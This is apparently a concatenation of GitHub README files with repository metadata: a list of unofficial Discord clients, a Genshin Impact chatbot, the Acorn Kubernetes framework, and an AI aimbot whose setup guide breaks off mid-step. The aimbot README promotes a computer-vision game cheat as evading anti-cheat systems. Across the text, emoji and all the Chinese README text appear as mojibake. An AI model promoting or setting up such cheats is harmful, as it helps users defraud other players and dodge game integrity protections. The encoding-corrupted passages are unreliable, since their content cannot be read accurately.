| [![Swift][Swift-Badge]][Swift-Url] | ๐ŸŸข Active | | [WebCord](https://github.com/SpacingBat3/WebCord) | A Discord API-less client made with Electron | [![TypeScript][TypeScript-Badge]][TypeScript-Url] | ๐Ÿ”ต Active *(Variable[^2]\)* | | [Spacebar Chat](https://spacebar.chat/) | Open source, themeable and extendable discord-compatible native Spacebar client | [![TypeScript][TypeScript-Badge]][TypeScript-Url] | ๐ŸŸข Active | | [Discord Tauri](https://github.com/DiscordTauri/discord-tauri) | A lightweight Discord wrapper made in Tauri | [![Rust][Rust-Badge]][Rust-Url] | ๐Ÿ”ด Discontinued | | [Disrust](https://github.com/DvorakDwarf/disrust) | A discord TUI client written entirely in Rust | [![Rust][Rust-Badge]][Rust-Url] | ๐ŸŸ  On hiatus, since January 2023 | | [Accord](https://github.com/evelyneee/accord) | Client for modern Macs | [![Swift][Swift-Badge]][Swift-Url] | ๐ŸŸ  On hiatus, since December 2022 | | [Unicord](https://github.com/UnicordDev/Unicord) | Discord Client for Windows 10 and Windows 10 Mobile | [![C#][C#-Badge]][C#-Url] | ๐ŸŸ  On hiatus, since April 2022 | | [NativeCord](https://github.com/andre4ik3/NativeCord) | SSB (site-specific browser) for Discord. In other words, all it does is load Discord as a website... in an app. | [![Swift][Swift-Badge]][Swift-Url] | ๐ŸŸ  On hiatus, since March 2022 | | [Unofficial-discord-client](https://github.com/Coding-Bunker/unofficial-discord-client) | Unofficial client for discord built in C++ with Qt. | [![C++][C++-Badge]][C++-Url] | ๐ŸŸ  On hiatus, since March 2022 | | [ToastCord](https://github.com/Traumatism/ToastCord) | Discord Terminal UI made in Python 3 | [![Python][Python-Badge]][Python-Url] | ๐Ÿ”ด Discontinued | | [Discord Lite](https://github.com/dosdude1/discord-lite) | An ultra-lightweight native Discord client for vintage and modern macOS | [![Objective-C][Objective-C-Badge]][Objective-C-Url] | ๐ŸŸ  On hiatus, since January 2022 | | [Mirdorph](https://gitlab.gnome.org/ranchester/mirdorph) | A crappy low feature Discord Client using libadwaita | [![Python][Python-Badge]][Python-Url] | ๐Ÿ”ด Discontinued | | [Ripcord](https://cancel.fm/ripcord/) | Alternative desktop chat client for Slack (and Discord) designed for power users. | [Closed source] | ๐ŸŸ  On hiatus, since July 2021 | | [DiscordQt](https://github.com/ruslang02/discord-qt) | A Discord desktop client powered by Node.JS and NodeGui. | [![TypeScript][TypeScript-Badge]][TypeScript-Url] | ๐Ÿ”ด Discontinued | | [concord](https://github.com/volatide/concord) | Discord client made in Qt5 | [![Python][Python-Badge]][Python-Url] | ๐Ÿ”ด Discontinued | | [protocord](https://github.com/diamondburned/protocord) | A prototype CLI for a tiny Discord client. | [![Go][Go-Badge]][Go-Url] | ๐Ÿ”ด Discontinued | | [Pesterchum-Discord](https://github.com/henry232323/Pesterchum-Discord) | A Discord client mimicking the Pesterchum chat client from Homestuck, for the few people who are still interested in that. | [![Python][Python-Badge]][Python-Url] | ๐Ÿ”ด Discontinued | | [DiscordFlex](https://github.com/ZenithRogue/DiscordFlex) | A custom Discord client built from the ground up.
| [![JavaScript][JavaScript-Badge]][JavaScript-Url] [![Vue.js][Vue.js-Badge]][Vue.js-Url] | ๐Ÿ”ด Discontinued | | [micro-discord](https://github.com/soukouki/micro-discord) | Simple discord client that doesn't use javascript | [![Ruby][Ruby-Badge]][Ruby-Url] | ๐Ÿ”ด Discontinued | | [Disorder](https://github.com/lexffe/discorder) | Command line discord client | [![Go][Go-Badge]][Go-Url] | ๐Ÿ”ด Discontinued | | [Fast-Discord](https://github.com/EnyoYoen/Fast-Discord) | Client written in C++ and Qt | [![C++][C++-Badge]][C++-Url] | ๐Ÿ”ด Discontinued | | [Rikka](https://github.com/rikka-org/Rikka) | Rikka is a fast, powerful, and extendable Discord modification. It can load plugins, manage plugins, and features a rich API. | [![TypeScript][TypeScript-Badge]][TypeScript-Url] [![JavaScript][JavaScript-Badge]][JavaScript-Url] | ๐Ÿ”ด Discontinued | | [Harmony](https://github.com/hlafaille/Harmony) | A Java-based Discord client. | [![Java][Java-Badge]][Java-Url] | ๐Ÿ”ด Discontinued | | [6cord](https://6cord.diamondb.xyz/) | A terminal front-end for the Discord chat service | [![Go][Go-Badge]][Go-Url] | ๐Ÿ”ด Discontinued | | [Terminalcord](https://github.com/xynxynxyn/terminal-discord) | Simple terminal client for discord with a minimal look and UI. | [![JavaScript][JavaScript-Badge]][JavaScript-Url] | ๐Ÿ”ด Discontinued | | [discord-curses](https://github.com/RX14/discord-curses) | Terminal-based discord client | [![TypeScript][TypeScript-Badge]][TypeScript-Url] | ๐Ÿ”ด Discontinued | | [Discline](https://github.com/mitchweaver/Discline) | A terminal Discord client that you can actually use. | [![Python][Python-Badge]][Python-Url] | ๐Ÿ”ด Discontinued | | [GTK3cord](https://github.com/diamondburned/gtkcord3) | A Gtk3 Discord client in Golang | [![Go][Go-Badge]][Go-Url] | ๐Ÿ”ด Discontinued; development shifted to GTK4cord | | [Discord-Terminal](https://github.com/atlx/discord-term) | An extensible Discord terminal client. Can be used with bot or user tokens. | [![JavaScript][JavaScript-Badge]][JavaScript-Url] | ๐Ÿ”ด Discontinued, Looking for maintainers | | [Cordless](https://github.com/Bios-Marcel/cordless) | Cordless is a custom Discord client that aims to have a low memory footprint and is aimed at power-users. | [![Go][Go-Badge]][Go-Url] | โ›” Discontinued, Developer got banned during development | | [Discord-Lite](https://web.archive.org/web/20221230055539/https://github.com/therealcyber71/Discord-Lite) | A Light-Weight Discord Client written in Python for developers, by developers. | [![Python][Python-Badge]][Python-Url] | ๐Ÿ”ด Discontinued, Developer MIA, repo and account deleted | | [Voidcord](https://web.archive.org/web/20230517194514/https://github.com/logoskosmos/voidcord) | A lightweight and extendable Discord web client on top of Neutralinojs.
| [![JavaScript][JavaScript-Badge]][JavaScript-Url] | ๐Ÿ”ด Discontinued, Developer repo and account deleted | ## Console clients | Name | Features | Language(s) | Development Status | | :---: | :---: | :---: | :---: | | [A-client-for-Discord-for-3DS](https://github.com/XeathJP/A-client-for-Discord-for-3DS) | An application for using Discord on the 3DS | [![C++][C++-Badge]][C++-Url] | ๐ŸŸ  On hiatus, since January 2022 | | [crcophony](https://github.com/freyamade/crcophony) | Fast, neat discord TUI written in Crystal (read: cacophony) | [![Crystal][Crystal-Badge]][Crystal-Url] | ๐ŸŸ  On hiatus, since November 2019 | | [NXCord](https://github.com/Grarak/NXCord) | Unofficial Nintendo Switch Discord client | [![C++][C++-Badge]][C++-Url] | ๐ŸŸ  On hiatus, since April 2020 | | [Unofficial Discord 3DS Client](https://github.com/yourWaifu/Unofficial-Discord-3DS-Client) | This is just a simple Discord client for the 3DS, built using the `Sleepy Discord` library and the `Wslay` library. | [![C++][C++-Badge]][C++-Url] | ๐ŸŸ  On hiatus, since November 2017 | | [Quarrel](https://github.com/UWPCommunity/Quarrel) | Quarrel is a Discord client for Windows and Xbox that aims to bring voice chat to Xbox and improved support for varying screen sizes on devices running Windows. | [![C#][C#-Badge]][C#-Url] | ๐ŸŸ  On hiatus, since August 2022 | | [VitaCord](https://github.com/devingDev/VitaCord) | Discord Client for PS Vita / PS TV | [![C++][C++-Badge]][C++-Url] | ๐ŸŸ  On hiatus, since March 2018 | | [Switchcord](https://github.com/vbe0201/switchcord) | An unofficial Discord client for the Nintendo Switch console. | [![C++][C++-Badge]][C++-Url] | ๐Ÿ”ด Discontinued | | [3DiScord](https://github.com/cheuble/3DiScord) | A Discord client for the Nintendo 3DS | [![C++][C++-Badge]][C++-Url] | โ›” Discontinued; will get you banned | ## Other clients | Name | Features | Language(s) | Development Status | | :---: | :---: | :---: | :---: | | [Discross](http://discross.rc24.xyz/index.html) | A webhook bridge to send messages on Discord through a webpage | [![JavaScript][JavaScript-Badge]][JavaScript-Url] | ๐ŸŸข Active | | [purple-discord](https://github.com/EionRobb/purple-discord) | A libpurple/Pidgin plugin for Discord | [![C][C-Badge]][C-Url] | ๐ŸŸข Active | | [Reliable Discord-client IRC Daemon (rdircd)](https://github.com/mk-fg/reliable-discord-client-irc-daemon) | Reliable personal discord-client to irc-server translation daemon | [![Python][Python-Badge]][Python-Url] | ๐ŸŸข Active | | [discord-j2me](https://github.com/gtrxAC/discord-j2me) | Discord client for Java ME (MIDP 2.0) devices | [![JavaScript][JavaScript-Badge]][JavaScript-Url] | ๐ŸŸข Active | | [Weechat Discord](https://github.com/terminal-discord/weechat-discord) | Weechat plugin for Discord support. | [![Rust][Rust-Badge]][Rust-Url] | ๐ŸŸข Active | | [bitlbee-discord](https://github.com/sm00th/bitlbee-discord) | Discord protocol plugin for BitlBee. | [![C][C-Badge]][C-Url] | ๐ŸŸ  On hiatus, since September 2021 | | [crocodile](https://github.com/tbodt/crocodile) | Discord client for TempleOS.
| [![Python][Python-Badge]][Python-Url] | ๐ŸŸ  On hiatus, since November 2017 | | [discord-aos](https://github.com/ruslang02/discord-aos) | Discord client for Sailfish OS | [![Qt][Qt-Badge]][Qt-Url] [![TypeScript][TypeScript-Badge]][TypeScript-Url] | ๐ŸŸ  On hiatus, since November 2021 | | [discord-ppc](https://github.com/vistafan12/discord-ppc) | Discord version for PowerPC architecture | [![JavaScript][JavaScript-Badge]][JavaScript-Url] | ๐ŸŸ  On hiatus, since June 2017 | | [Arcscord](https://github.com/Arcoz0308/arcscord) | NodeJS library written in TypeScript that interacts with the Discord API | [![TypeScript][TypeScript-Badge]][TypeScript-Url] | ๐Ÿ”ด Discontinued | ## Third party server implementations The following are server implementations that reimplement Discord's client-server API: | Name | Features | Language(s) | Development Status | | :---: | :---: | :---: | :---: | | [Reflectcord](https://github.com/V3L0C1T13S/reflectcord) | Reimplementation of Discord API Server on top of Revolt.chat, intended for self hosting | [![JavaScript][JavaScript-Badge]][JavaScript-Url] [![TypeScript][TypeScript-Badge]][TypeScript-Url] | ๐ŸŸข Active | | [Spacebar Chat](https://spacebar.chat/) | Almost fully featured re-implementation of Discord API Server, intended for self hosting | [![TypeScript][TypeScript-Badge]][TypeScript-Url] | ๐ŸŸข Active | | [Litecord](https://gitlab.com/litecord/litecord) | Partial reimplementation of Discord API Server, not intended for self hosting | [![Python][Python-Badge]][Python-Url] | ๐ŸŸ  On hiatus, since May 2023 | [^1]: Discord brought a breaking change for the mod in question. [^2]: Some occasional breaks might occur depending on the maintainers' free time. ## Contributing Please refer to [CONTRIBUTING.md](/.github/CONTRIBUTING.md) if you want to contribute to this project. ## Further comments Will update as needed! If you would like, feel free to reach out to [Nekopara#4266](https://discord.com/users/1074227433395470376) (Head of Team) on the official Discord: https://discord.gg/3kv5yzTYQE ## Disclaimer We (the contributors) are not responsible for you getting banned for using a third-party client or getting kicked from servers.
[C-Badge]: https://img.shields.io/badge/C-%2300599C.svg?style=flat&logo=c&logoColor=white [C-Url]: https://en.wikipedia.org/wiki/C_(programming_language) "C" [C++-Badge]: https://img.shields.io/badge/C++-%2300599C.svg?style=flat&logo=c%2B%2B&logoColor=white [C++-Url]: https://en.wikipedia.org/wiki/C++ "C++" [C#-Badge]: https://img.shields.io/badge/C%23-%23239120.svg?style=flat&logo=c-sharp&logoColor=white [C#-Url]: https://en.wikipedia.org/wiki/C_Sharp_(programming_language) "C#" [Crystal-Badge]: https://img.shields.io/badge/Crystal-%23000000.svg?style=flat&logo=crystal&logoColor=white [Crystal-Url]: https://en.wikipedia.org/wiki/Crystal_(programming_language) "Crystal" [Dart-Badge]: https://img.shields.io/badge/Dart-%230175C2.svg?style=flat&logo=dart&logoColor=white [Dart-Url]: https://en.wikipedia.org/wiki/Dart_(programming_language) "Dart" [Go-Badge]: https://img.shields.io/badge/Go-%2300ADD8.svg?style=flat&logo=go&logoColor=white [Go-Url]: https://en.wikipedia.org/wiki/Go_(programming_language) "Go" [Java-Badge]: https://img.shields.io/badge/Java-%23ED8B00.svg?style=flat&logo=java&logoColor=white [Java-Url]: https://en.wikipedia.org/wiki/Java_(programming_language) "Java" [JavaScript-Badge]: https://img.shields.io/badge/JavaScript-%23323330.svg?style=flat&logo=javascript&logoColor=%23F7DF1E [JavaScript-Url]: https://en.wikipedia.org/wiki/JavaScript "JavaScript" [Kotlin-Badge]: https://img.shields.io/badge/Kotlin-%230095D5.svg?style=flat&logo=kotlin&logoColor=white [Kotlin-Url]: https://en.wikipedia.org/wiki/Kotlin_(programming_language) "Kotlin" [Nim-Badge]: https://img.shields.io/badge/Nim-%23161820.svg?style=flat&logo=nim&logoColor=%23ffe953 [Nim-Url]: https://en.wikipedia.org/wiki/Nim_(programming_language) "Nim" [Objective-C-Badge]: https://img.shields.io/badge/Objective%20C-000000.svg?&style=flat&logo=Apple&logoColor=white [Objective-C-Url]: https://en.wikipedia.org/wiki/Objective-C "Objective-C" [Python-Badge]: https://img.shields.io/badge/Python-3670A0?style=flat&logo=python&logoColor=ffdd54 [Python-Url]: https://en.wikipedia.org/wiki/Python_(programming_language) "Python" [Qt-Badge]: https://img.shields.io/badge/Qt-%23217346.svg?style=flat&logo=Qt&logoColor=white [Qt-Url]: https://en.wikipedia.org/wiki/QML "Qt" [Ruby-Badge]: https://img.shields.io/badge/ruby-%23CC342D.svg?style=flat&logo=ruby&logoColor=white [Ruby-Url]: https://en.wikipedia.org/wiki/Ruby_(programming_language) "Ruby" [Shell Script-Badge]: https://img.shields.io/badge/Shell_Script-%23121011.svg?style=flat&logo=gnu-bash&logoColor=white [Shell Script-Url]: https://en.wikipedia.org/wiki/Shell_script "Shell Script" [Swift-Badge]: https://img.shields.io/badge/Swift-F54A2A?style=flat&logo=swift&logoColor=white [Swift-Url]: https://en.wikipedia.org/wiki/Swift_(programming_language) "Swift" [TypeScript-Badge]: https://img.shields.io/badge/TypeScript-%23007ACC.svg?style=flat&logo=typescript&logoColor=white [TypeScript-Url]: https://en.wikipedia.org/wiki/TypeScript "TypeScript" [Vue.js-Badge]: https://img.shields.io/badge/Vue.js-%2335495e.svg?style=flat&logo=vuedotjs&logoColor=%234FC08D [Vue.js-Url]: https://en.wikipedia.org/wiki/Vue.js "Vue.js" [Zig-Badge]: https://img.shields.io/badge/Zig-%23F7A41D.svg?style=flat&logo=zig&logoColor=white [Zig-Url]: https://en.wikipedia.org/wiki/Zig_(programming_language) "Zig" [Rust-Badge]: https://img.shields.io/badge/Rust-%23000000.svg?&logo=Rust [Rust-url]: https://en.wikipedia.org/wiki/Rust "Rust" [React-Badge]: 
https://img.shields.io/badge/React-%2361DAFB?style=flat&logo=react&labelColor=black&color=blue [React-url]: https://en.wikipedia.org/wiki/React_(software) "React"
A non-exhaustive collection of third-party clients and mods for Discord.
discord,discord-client,discord-mod,discord-libraries,discord-library,encyclopedia,listing
0
42
89
258
2
1
0
CMHopeSunshine/LittlePaimon
<p align="center" > <a href="https://github.com/CMHopeSunshine/LittlePaimon/tree/nonebot2"><img src="https://s1.ax1x.com/2023/02/05/pS62DJK.png" width="256" height="256" alt="LittlePaimon"></a> </p> <h1 align="center">ๅฐๆดพ่’™|LittlePaimon</h1> <h4 align="center">โœจๅŸบไบŽ<a href="https://github.com/nonebot/nonebot2" target="_blank">NoneBot2</a>็š„ๅŽŸ็ฅžๆœบๅ™จไบบโœจ</h4> <p align="center"> <a href="https://cdn.jsdelivr.net/gh/CMHopeSunshine/LittlePaimon@master/LICENSE"><img src="https://img.shields.io/github/license/CMHopeSunshine/LittlePaimon" alt="license"></a> <img src="https://img.shields.io/badge/Python-3.8+-yellow" alt="python"> </p> ## ไธจ็ฎ€ไป‹ ๅŽŸ็ฅžๅคšๅŠŸ่ƒฝๆœบๅ™จไบบ๏ผŒๆŸฅ่ฏขๆธธๆˆไฟกๆฏใ€ๅ›พ้‰ดๆ”ป็•ฅใ€ๆ ‘่„‚ๆ้†’็ญ‰็ญ‰๏ผŒไปฅๅŠๅ„็งๅ„ๆ ท็š„ๅฅฝ็Žฉ็š„ๅŠŸ่ƒฝ๏ผŒไธไป…ไป…ๆ˜ฏๅŽŸ็ฅžใ€‚ ็›ฎๅ‰ๆš‚ๅชๆ”ฏๆŒonebotๅ่ฎฎ๏ผŒๆญฃๅœจๅผ€ๅ‘ๅคš่Šๅคฉๅนณๅฐ็š„~~่ˆนๆ–ฐ~~็‰ˆๆœฌใ€‚ ## ไธจๅฟซ้€Ÿ้ƒจ็ฝฒ ไฝฟ็”จ[ๅฐๆดพ่’™่„šๆ‰‹ๆžถๆ’ไปถ](https://github.com/CMHopeSunshine/nb-cli-plugin-littlepaimon)ๅฟซ้€Ÿ้ƒจ็ฝฒๅฎ‰่ฃ…ๅฐๆดพ่’™ใ€‚ [![asciicast](https://asciinema.org/a/kMBRbuX5lCEnk5lmXcU53ys5b.svg)](https://asciinema.org/a/kMBRbuX5lCEnk5lmXcU53ys5b) ## ไธจๆ–‡ๆกฃ > [ๆ–‡ๆกฃๅœฐๅ€](docs.paimon.cherishmoon.top) ## | ๅŠŸ่ƒฝ็คบไพ‹ <details> <summary>ๅธฎๅŠฉๅˆ—่กจ</summary> <img src="https://s1.ax1x.com/2023/02/05/pS6gWCT.jpg" alt="help"> </details> <details> <summary>็Žฉๅฎถๅก็‰‡</summary> <img src="https://s1.ax1x.com/2023/02/05/pS6g25V.jpg" alt="ys"> </details> <details> <summary>่ง’่‰ฒ่ƒŒๅŒ…</summary> <img src="https://s1.ax1x.com/2023/02/05/pS6ggU0.jpg" alt="ysa"> </details> <details> <summary>่ง’่‰ฒ้ขๆฟ</summary> <img src="https://s1.ax1x.com/2023/02/05/pS6gh2F.jpg" alt="ysd"> </details> <details> <summary>่ง’่‰ฒๅก็‰‡</summary> <img src="https://s1.ax1x.com/2023/02/05/pS6gf8U.jpg" alt="ysc"> </details> <details> <summary>ๆทฑๆธŠๆˆ˜ๆŠฅ</summary> <img src="https://s1.ax1x.com/2023/02/05/pS6gcEq.jpg" alt="sy"> </details> <details> <summary>ๅฎžๆ—ถไพฟ็ญพ</summary> <img src="https://s1.ax1x.com/2023/02/05/pS6gybn.jpg" alt="ssbq"> </details> <details> <summary>่ง’่‰ฒๅ›พ้‰ด</summary> <img src="https://s1.ax1x.com/2023/02/05/pS6fAG6.jpg" alt="map"> </details> ## | Playwright็›ธๅ…ณ้—ฎ้ข˜ ๅ› ้ƒจๅˆ†็ณป็ปŸไธ้€‚็”จไบŽchromium๏ผˆ่ฐทๆญŒๆต่งˆๅ™จ๏ผ‰๏ผŒๆ•…ๅฐ†้ป˜่ฎคๅ†…ๆ ธๆ”นไธบFireFox ๅฆ‚้œ€ๅˆ‡ๆข๏ผŒๅฏๆ›ดๆ”น config/paimon_config_default.yml ็š„้ป˜่ฎคๅ€ผ ## | ๅธธ่ง้—ฎ้ข˜&่‡ด่ฐข ่ฏฆ่ง[ๅธธ่ง้—ฎ้ข˜](https://docs.paimon.cherishmoon.top/question.html)ๅ’Œ[่‡ด่ฐข](https://docs.paimon.cherishmoon.top/thanks.html)ใ€‚ ## | ๅ…ถไป– - ๅฆ‚ๆžœไฝ ๅ–œๆฌข่ฟ™ไธช้กน็›ฎ๏ผŒๆฌข่ฟŽ็ป™ไธชstarๆˆ–่€…[็ˆฑๅ‘็”ต](https://afdian.net/a/cherishmoon)๏ผŒๅๅˆ†ๆ„Ÿ่ฐขใ€‚ - ๆœฌ้กน็›ฎๅฎŒๅ…จๅผ€ๆบๅ…่ดน๏ผŒไป…ไพ›ๅญฆไน ไฝฟ็”จ๏ผŒ็ฆๆญข็”จไบŽๅ•†ไธš็”จ้€”ๅ’Œ้žๆณ•่กŒไธบ๏ผŒๅฆ‚ๆœ‰ไป–ไบบ้žๆณ•ไฝฟ็”จ๏ผŒไธŽๆœฌไฝœ่€…ๆ— ๅ…ณใ€‚ - ๅฆ‚ๆžœๆ‚จไฝฟ็”จๅนถไฟฎๆ”นไบ†ๆœฌ้กน็›ฎๆบ็ ๏ผŒ่ฏท้ตๅพช[AGPL-3.0](https://github.com/CMHopeSunshine/LittlePaimon/blob/Bot/LICENSE)ๅฐ†ๆบ็ ๅผ€ๆบใ€‚
ๅฐๆดพ่’™๏ผๅŸบไบŽNonebot2็š„ๅŽŸ็ฅžๆœบๅ™จไบบ๏ผŒๅŒ…ๆ‹ฌไฝ†ไธ้™ไบŽUID้ขๆฟๆŸฅ่ฏขใ€ๆŠฝๅก่ฎฐๅฝ•ๅˆ†ๆžใ€ๆธธๆˆๆ”ป็•ฅๅ›พ้‰ดใ€ๅฎžๆ—ถไพฟ็ญพใ€ๅŽŸ็Ÿณๆœญ่ฎฐใ€็พค่Šๅญฆไน ใ€็พค็ฎก็ญ‰ๅŠŸ่ƒฝใ€‚/ LittlePamon! Genshin Impact multifunctional bot based on Nonebot2.
qqbot,genshin,genshin-impact,nonebot,python,mihoyo,chatbot,nonebot2,onebot
1
21
98
449
33
5
2
acorn-io/runtime
# Acorn ![main-release](https://github.com/acorn-io/runtime/actions/workflows/main-release.yaml/badge.svg) A simple application deployment framework for Kubernetes. - One artifact across dev, test, and production - Simple CLI and powerful API - Runs on any Kubernetes cluster | :memo: | Acorn is a work in progress. Features will evolve over time and there may be breaking changes between releases. Please give us your feedback in Slack, Discussions, or Issues! | |-|:-| ## Get Started - [Downloads](https://github.com/acorn-io/runtime/releases) - [Runtime Documentation](https://runtime-docs.acorn.io) - [Community Slack](https://slack.acorn.io) - [Discussions Forum](https://github.com/acorn-io/runtime/discussions) ## Contributing For the basics on how to contribute to Acorn, check out [CONTRIBUTING.md](CONTRIBUTING.md). More details can also be found in our [developer wiki](https://github.com/acorn-io/runtime/wiki). ## License Copyright (c) 2023 [Acorn Labs, Inc.](http://acorn.io) Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at [http://www.apache.org/licenses/LICENSE-2.0](http://www.apache.org/licenses/LICENSE-2.0) Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.
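For a sense of what the "one artifact" model looks like in practice, here is a minimal sketch loosely based on the project's quickstart conventions; the exact Acornfile fields and CLI behaviour may differ between releases, so treat this as illustrative rather than authoritative:

```
// Acornfile - describes the whole app as a single deployable artifact
containers: {
  web: {
    image: "nginx"             // public image to run
    ports: publish: "80/http"  // publish HTTP port 80
  }
}
```

Running something like `acorn run .` in the directory containing the Acornfile would then deploy the same artifact to whichever Kubernetes cluster the CLI is pointed at.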
A simple application deployment framework built on Kubernetes
hacktoberfest,kubernetes
100
39
1,597
2,687
223
29
5
RootKit-Org/AI-Aimbot
# ๐ŸŽฏ World's Best AI Aimbot ๐ŸŽฎ ![World's Best AI Aimbot Banner](imgs/banner.png) [![Pull Requests Welcome](https://img.shields.io/badge/PRs-welcome-brightgreen.svg?style=flat)](http://makeapullrequest.com) ## โœจBEST EXPERIENCE, Use our Launcher and the Launcher Custom Code Pack!โœจ ### Over 10,000 users use the Launcher ### ๐Ÿ”ด LIVE: Aimbot International 2024 - Win $1,000s Prepare your custom code and submit it for the Aimbot International, which ends later this year. Work alone or in a team. Check out the following videos to learn more. All custom code must be submitted through the launcher. https://youtube.com/live/mtV6w2qhaNs?feature=share Download the [RootKit Launcher](https://github.com/RootKit-Org/Launcher). It is FREE. **No coding required.** It will auto-setup everything for you! Want to make your own bot? Then use the [Starter Code Pack](https://github.com/RootKit-Org/AI-Aimbot-Starter-Code)! ## ๐Ÿ™Œ Welcome Aboard! We're a charity on a mission to educate and certify the upcoming wave of developers in the world of Computer Engineering ๐ŸŒ. Need assistance? Hop into our [Discord](https://discord.gg/rootkitorg) and toss your questions at `@Wonder` in the *#ai-aimbot channel* (be sure to stick to this channel or face the consequences! ๐Ÿ˜ฌ). Type away your query and include `@Wonder` in there. Our *AI Aimbot* ๐Ÿค– sharpshoots targets in **any game with humanoid characters**, harnessing the power of [YOLOv5](https://github.com/ultralytics). Currently, it's a ninja against anti-cheat systems, as it's visual-only. Still, watch out for manual player reports! ๐Ÿ‘€ Intended for educational use ๐ŸŽ“, this project aims to highlight how vulnerable game devs are to AI-driven cheats. Pass it along to your game developer buddies, and save their games from being outsmarted! **โš  Use at your own risk! If you're caught... well, you've been warned!** ## ๐Ÿ“น Instructional Media - [Watch the tutorial video (Works But Outdated)](https://www.youtube.com/watch?v=TCJHLbbeLhg) - [Watch the live stream explainer (Works But Outdated)](https://www.youtube.com/watch?v=uniL5yR7y0M&ab_channel=RootKit) - [Join the Discord](https://discord.gg/rootkitorg) ## There are 3 Versions ๐Ÿš€๐Ÿšฆ๐Ÿ–ฅ๏ธ - Fast ๐Ÿƒโ€โ™‚๏ธ - `main.py` โœ… Easy to set up, Works on any computer ๐Ÿ’ป - Faster ๐Ÿƒโ€โ™‚๏ธ๐Ÿ’จ - `main_onnx.py` โš™๏ธ May need to edit a file, Works on any computer ๐Ÿ’ป - Fastest ๐Ÿš€ - `main_tensorrt.py` ๐Ÿข Enterprise level hard, Works on computers with Nvidia GPUs only ๐ŸŽฎ ## ๐Ÿงฐ Requirements - Nvidia GTX 980 ๐Ÿ†™ or higher, or equivalent - And one of the following: - Nvidia CUDA Toolkit 11.8 [DOWNLOAD HERE](https://developer.nvidia.com/cuda-11-8-0-download-archive) ## ๐Ÿš€ Pre-setup Steps 1. Download and Unzip the AI Aimbot and stash the folder somewhere handy ๐Ÿ—‚๏ธ. 2. Ensure you've got Python installed (like a pet python ๐Ÿ) โ€“ grab version 3.11 [HERE](https://www.python.org/downloads/release/python-3116/). - ๐Ÿ›‘ Facing a `python is not recognized...` error? [WATCH THIS!](https://youtu.be/E2HvWhhAW0g) - ๐Ÿ›‘ Is it a `pip is not recognized...` error? [WATCH THIS!](https://youtu.be/zWYvRS7DtOg) 3. Fire up `PowerShell` or `Command Prompt` on Windows ๐Ÿ”. 4. To install `PyTorch`, select the appropriate command based on your GPU. - Nvidia `pip install torch==2.0.1 torchvision==0.15.2 torchaudio==2.0.2 --index-url https://download.pytorch.org/whl/cu118` - AMD or CPU `pip install torch torchvision torchaudio` 5.
๐Ÿ“ฆ Run the command below to install the required Open Source packages: ``` pip install -r requirements.txt ``` ## ๐Ÿ”Œ How to Run (Fast ๐Ÿƒโ€โ™‚๏ธ Version) Follow these steps **after** Python and all packages have been installed: 1. Open `PowerShell` โšก or `Command Prompt` ๐Ÿ’ป. 2. Input `cd `, then drag & drop the folder containing the bot code into the terminal. 3. Hit Enter โ†ฉ๏ธ. 4. Type `python main.py` and press Enter. 5. Use **CAPS_LOCK** to toggle the aimbot ๐ŸŽฏ. It begins in the *off* state. 6. Pressing `q` ๐Ÿ’ฃ at **ANY TIME** will shut down the program. ## ๐Ÿ”Œ How to Run (Faster ๐Ÿƒโ€โ™‚๏ธ๐Ÿ’จ Version) Follow these steps **after** Python and all packages have been installed: 1. Open the `config.py` ๐Ÿ“„ file and tweak the `onnxChoice` variable to correspond with your hardware specs: - `onnxChoice = 1` # CPU ONLY ๐Ÿ–ฅ - `onnxChoice = 2` # AMD/NVIDIA ONLY ๐ŸŽฎ - `onnxChoice = 3` # NVIDIA ONLY ๐ŸŽ๏ธ 2. If you have an NVIDIA setup, run the following ``` pip install onnxruntime-gpu pip install cupy-cuda11x ``` 3. Follow the same steps as for the Fast ๐Ÿƒโ€โ™‚๏ธ Version above, except for step 4 you will run `python main_onnx.py` instead. ## ๐Ÿ”Œ How to Run (Fastest ๐Ÿš€ Version) Follow these sparkly steps to get your TensorRT ready for action! ๐Ÿ› ๏ธโœจ 1. **Introduction** ๐ŸŽฌ Watch the TensorRT section of the setup [video ๐ŸŽฅ](https://www.youtube.com/watch?v=uniL5yR7y0M&ab_channel=RootKit) before you begin. It's loaded with useful tips! 2. **Oops! Don't Forget the Environment** ๐ŸŒฑ We forgot to mention adding environmental variable paths in the video. Make sure to do this part! 3. **Get Support If You're Stumped** ๐Ÿค” If you ever feel lost, you can always `@Wonder` your questions in our [Discord ๐Ÿ’ฌ](https://discord.gg/rootkitorg). Wonder is here to help! 4. **Install Cupy** Run the following `pip install cupy-cuda11x` 5. **CUDNN Installation** ๐Ÿงฉ Click to install [CUDNN ๐Ÿ“ฅ](https://developer.nvidia.com/downloads/compute/cudnn/secure/8.9.6/local_installers/11.x/cudnn-windows-x86_64-8.9.6.50_cuda11-archive.zip/). You'll need a Nvidia account to proceed. Don't worry it's free. 6. **Unzip and Relocate** ๐Ÿ“โžก๏ธ Open the .zip CuDNN file and move all the folders/files to where the CUDA Toolkit is on your machine, usually at `C:\Program Files\NVIDIA GPU Computing Toolkit\CUDA\v11.8`. 7. **Get TensorRT 8.6 GA** ๐Ÿ”ฝ Fetch [`TensorRT 8.6 GA ๐Ÿ›’`](https://developer.nvidia.com/downloads/compute/machine-learning/tensorrt/secure/8.6.1/zip/TensorRT-8.6.1.6.Windows10.x86_64.cuda-11.8.zip). 8. **Unzip and Relocate** ๐Ÿ“โžก๏ธ Open the .zip TensorRT file and move all the folders/files to where the CUDA Toolkit is on your machine, usually at `C:\Program Files\NVIDIA GPU Computing Toolkit\CUDA\v11.8`. 9. **Python TensorRT Installation** ๐ŸŽก Once you have all the files copied over, you should have a folder at `C:\Program Files\NVIDIA GPU Computing Toolkit\CUDA\v11.8\python`. If you do, good, then run the following command to install TensorRT in python. ``` pip install "C:\Program Files\NVIDIA GPU Computing Toolkit\CUDA\v11.8\python\tensorrt-8.6.1-cp311-none-win_amd64.whl" ``` ๐Ÿšจ If the step above didn't work, don't stress out! ๐Ÿ˜… The labeling of the files corresponds with the Python version you have installed on your machine. We're not looking for the 'lean' or 'dispatch' versions. ๐Ÿ” Just locate the correct file and replace the path with your new one. ๐Ÿ”„ You've got this! ๐Ÿ’ช 10.
